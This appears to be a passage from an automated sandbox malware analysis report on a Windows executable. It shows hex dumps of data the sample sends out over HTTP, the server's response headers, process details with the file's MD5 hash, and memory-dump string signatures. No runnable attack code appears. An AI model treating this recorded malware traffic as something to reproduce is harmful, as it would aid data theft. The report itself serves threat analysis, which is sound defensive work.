                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 71 53 b7 51 80 73 01 bf d1 b1 1a 2d 77 f5 63 82 1e 59 13 dd fa 38 38 83 fb 40 aa 64 8c 73 c5 9e 01 04 95 de 9e 97 82 a4 74 49 5d f2 b3 c5 6f 3e 75 be 15 0e 8b 24 30 97 fa 69 d6 02 59 5e 7b aa a5 9d c1 8d 67 74 88 a5 26 4c dc fa e3 6d 04 88 6f 1d 50 94 a9 7b 93 0e 0f 06 03 be 0f b4 d1 b7 87 6b 63 01 80 2e d0 d6 8a d3 e3 d4 41 f0 e7 64 b2 c0 e5 2a 51 b6 f4 42 ac 45 d0 cc e2 8c 18 d0 49 40 44 2d eb c3 f1 ce f5 d1 4f 4f 25 21 46 4e da a0 12 62 24 0f 83 08 8f f7 a5 92 a0 7b 56 69 8e 03 d0 42 3a a0 e1 11 d2 f6 0c 12 e5 fd c7 f1 e0 94 9b a6 52 a7 64 77 72 d0 e1 a0 cb a2 c4 ee 71 8e 14 5f b5 b6 a6 ec 79 eb a7 be 2a be 6c c9 b3 12 70 71 fc c1 36 3b db 54 2e 25 16 fb af e5 87 a7 40 46 18 f2 5c 5f 66 30 2c 31 e1 70 18 80 65 1f c8 b6 fd 76 09 a8 79 eb 72 8d f5 a8 c4
                                                                                                                                                                                                                                                    Data Ascii: qSQs-wcY88@dstI]o>u$0iY^{gt&LmoP{kc.Ad*QBEI@D-OO%!FNb${ViB:Rdwrq_y*lpq6;T.%@F\_f0,1pevyr
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 75 9b 66 ca 2a 29 11 46 14 13 2b ba 62 5f 28 08 8b 81 7c b4 72 06 b9 76 1d fc 7c 4d 10 28 c3 e5 e2 5f 33 ff 25 58 1e 82 bd 8e 67 29 b1 21 e1 6b bd 7a 68 a0 db ff ae 91 1f a5 4b e0 c5 86 f6 e1 de 37 b5 f4 d5 ae e6 16 0b f9 99 52 51 e1 3b 0b 3c da de 46 56 9b 53 fa 9a 0c b6 ba 03 98 9b fb f5 9e 4d af 95 ce 0d 27 eb 23 bc be ca ca d3 25 81 98 f4 82 4c 48 52 4d cc 87 88 c4 a6 ab 9c c2 9d 73 8d 08 8a df e4 59 5a 96 28 55 13 fd 97 44 f4 27 04 1d 15 6a 78 be d9 10 a3 3e 2c cb 33 d9 70 d5 1b ae 49 ea 7d 6a b0 71 79 ef c1 28 7b 58 0f 33 90 48 17 d0 7f c3 fd 15 7d 6f 0e 91 8e b6 45 b0 c1 42 a9 6b ff 9f 8c 6f 7f 94 f6 84 ef 87 b1 3c 4f f8 8c 1b ef af 99 e0 fc 6f 78 bd 63 78 60 bc 11 5d e4 31 df 2e fc 1a 78 5f 14 59 af 5f 34 b6 0a f8 d8 db e7 5f df 80 02 e2 bb ec 57
                                                                                                                                                                                                                                                    Data Ascii: uf*)F+b_(|rv|M(_3%Xg)!kzhK7RQ;<FVSM'#%LHRMsYZ(UD'jx>,3pI}jqy({X3H}oEBko<Ooxcx`]1.x_Y_4_W
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 5f 3d d7 b6 e3 99 e1 96 eb 44 80 da 0f 0a b7 85 ef ed 63 bd ec 57 cb 36 24 e8 20 bf 88 8b 33 59 17 79 61 c3 49 9e 22 8b 48 cc e3 b2 49 7e c0 3c f6 da 69 a3 5c ae 78 af 87 d4 1d 6b a2 e8 c5 06 bc b0 0e 66 d0 58 78 11 a9 77 a5 38 f0 d2 eb 13 85 68 bd cb 96 6d a7 27 7f 15 7b 3b 35 1f 42 32 cf 25 4c 20 99 79 f4 0a 6f b0 fa f4 04 7f 89 de 0e e4 dd b3 72 fd 73 67 ee 9b 77 23 f9 09 d9 25 41 ab 77 d2 da 80 aa 45 64 d8 03 07 83 cd bb 58 e0 85 fa 1d c1 7f 64 84 da 4e 6e bd 03 0d 3f 7b 31 52 4f 6b d5 d6 3e 5d 32 ec 53 78 d8 ed 3b 2c 02 89 f8 53 25 11 47 39 8f 00 e7 a2 d3 0c 91 cf 40 06 14 9a c2 93 a2 53 5f 40 c9 38 12 6d b4 fa bf ce 9b 99 7f d8 2d e9 86 bd 51 82 a7 6d 1c 15 e2 23 d2 16 59 b4 d1 9b e1 77 4c 79 0e fa 17 45 e6 12 66 4c 0b 51 d0 ea 9e 5a 63 62 6f 98 af
                                                                                                                                                                                                                                                    Data Ascii: _=DcW6$ 3YyaI"HI~<i\xkfXxw8hm'{;5B2%L yorsgw#%AwEdXdNn?{1ROk>]2Sx;,S%G9@S_@8m-Qm#YwLyEfLQZcbo
                                                                                                                                                                                                                                                    2024-12-28 09:07:50 UTC15331OUTData Raw: 95 4e 3d d5 09 01 c1 37 44 41 ed ec 10 84 62 b7 39 0c f4 d0 11 ec c7 bf 94 ce d2 26 2a 82 46 10 61 1b 08 26 ff f3 0e 04 02 01 5c 4d b6 02 03 49 15 fa 39 04 ed 2a 91 ef 2b 7c ab 46 dc 6c c1 5a f5 c2 e1 0b 28 19 86 cf 60 45 e0 fc ed 3d 43 be 85 35 1b 6f 42 67 df 35 0d 3e 58 4a 2d e3 05 a6 ab d0 4f 20 e1 51 11 e8 ff 76 3c 3a cd 8d 83 a2 4d 2b 08 d0 24 38 71 8c b5 0d 01 1a 77 53 f2 3e d2 0b ad f8 2c c5 01 01 79 fb 0f 09 d1 75 5a 37 55 79 86 be bb 30 f6 58 fb e9 45 19 7b 5f 0a 77 15 f0 2e 3b 07 07 7f ab 74 8f a0 5c 69 ff f5 73 80 fc 29 46 23 43 c5 86 24 a3 da 50 e8 55 b1 bc f2 ea 74 e4 37 dd e0 2f de 16 25 ba f5 35 12 6c db 76 99 81 cf 80 b2 f2 a4 50 e2 83 1a c8 b6 a4 f5 cb ec ba 03 8a 84 51 49 3f a0 3e 01 b6 d0 7c ed 5d 1b 1f 59 c2 07 d0 69 c4 3b 03 91 85 a0
                                                                                                                                                                                                                                                    Data Ascii: N=7DAb9&*Fa&\MI9*+|FlZ(`E=C5oBg5>XJ-O Qv<:M+$8qwS>,yuZ7Uy0XE{_w.;t\is)F#C$PUt7/%5lvPQI?>|]Yi;
                                                                                                                                                                                                                                                    2024-12-28 09:07:56 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:56 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=0qomfuqr8u7d231u1rf26e3a59; expires=Wed, 23 Apr 2025 02:54:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UvTeLWJDiZtSbYbTP2ck19nGwLY4hylVRu6M2f4TYpP5UYYzxE2wJg6DrFvpGvv5%2BTO7qtmEsoOUIkPfapHX8D3wDKISkbt2DrNrITnFUOFrWmP4ZZl1tclyUBRSoBMIJFI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f90670419304304-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1555&rtt_var=597&sent=360&recv=591&lost=0&retrans=0&sent_bytes=2835&recv_bytes=574033&delivery_rate=1811414&cwnd=248&unsent_bytes=0&cid=d21da2f6d18250fc&ts=6005&x=0"


                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                    Start time:04:07:27
                                                                                                                                                                                                                                                    Start date:28/12/2024
                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\oe9KS7ZHUc.exe"
                                                                                                                                                                                                                                                    Imagebase:0x8d0000
                                                                                                                                                                                                                                                    File size:2'984'448 bytes
                                                                                                                                                                                                                                                    MD5 hash:2DE305CE45CDF39A8AD3C35979492CDD
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Reset < >
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000003.1859459476.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, Offset: 05CAE000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_3_5cae000_oe9KS7ZHUc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 1084$232&$P$bloc$q
                                                                                                                                                                                                                                                      • API String ID: 0-3013138911
                                                                                                                                                                                                                                                      • Opcode ID: 13f5a0f57a8b7506393956dbccc413894cb68e72bd700d86dd19d5c5f18f442d
                                                                                                                                                                                                                                                      • Instruction ID: 7125b8615fade68e8b9de7f743ebdc93351a7dde795c4c1358c75c8a06754e4f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13f5a0f57a8b7506393956dbccc413894cb68e72bd700d86dd19d5c5f18f442d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4051FF3280D3C25EF717CB3895496A2BFB1BF03724F6909DAC0D18F4A3D2A59A16C795
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000003.1859459476.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, Offset: 05CAE000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_3_5cae000_oe9KS7ZHUc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 1084$1719$232&$P
                                                                                                                                                                                                                                                      • API String ID: 0-2478264645
                                                                                                                                                                                                                                                      • Opcode ID: 8ec7e930411096a1c81a9038309c1f372ece6611311a4e390c5f5f5225481206
                                                                                                                                                                                                                                                      • Instruction ID: b8f57c305538a8ab9aabcf2451660e284381201acec7c1fd0fd77a2697aed1d0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ec7e930411096a1c81a9038309c1f372ece6611311a4e390c5f5f5225481206
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2021203281D7C76AF7169F7481066A57F70BE42311F6908DFC0C2CE563D2A28A51C386